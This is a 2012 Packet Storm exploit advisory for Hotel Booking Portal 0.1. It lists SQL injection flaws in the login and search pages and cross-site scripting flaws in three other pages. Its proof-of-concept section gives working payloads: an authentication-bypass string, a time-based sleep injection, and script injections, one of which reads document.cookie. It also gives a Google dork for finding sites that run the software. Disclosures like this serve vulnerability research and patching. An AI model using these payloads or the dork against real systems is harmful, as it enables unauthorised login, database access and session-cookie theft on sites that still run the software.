what you don't know can hurt you

Hotel Booking Portal 0.1 Cross Site Scripting / SQL Injection

Hotel Booking Portal 0.1 Cross Site Scripting / SQL Injection
Posted Aug 13, 2012
Authored by Yakir Wizman

Hotel Booking Portal version 0.1 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 6681a356490ff44dcaab0358c4e61b55

Hotel Booking Portal 0.1 Cross Site Scripting / SQL Injection

Change Mirror Download
# -----------------------------------------------------------
# _____ _ _ _ _
# / ____(_) | | | | |
# | | _| |_ __ _ __| | ___| |
# | | | | __/ _` |/ _` |/ _ \ |
# | |____| | || (_| | (_| | __/ |
# \_____|_|\__\__,_|\__,_|\___|_|
#
# -----------------------------------------------------------
# Hotel Booking Portal v0.1 Multiple Vulnerabilities
# Google dork: "Made And Powered By Hotels Portal"
# Bug discovered by Yakir Wizman, <yakir.wizman@gmail.com>
# Date 09/08/2012
# Download - http://sourceforge.net/projects/hbportal/
# ISRAEL
# -----------------------------------------------------------
# Author will be not responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters.
# 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter.
# 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# 1). POST a form to login.php with the value of:
# email set to : ' or '1'='1
# password set to : ' or '1'='1
# 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)='
# 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
# 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
# 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>
# -----------------------------------------------------------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close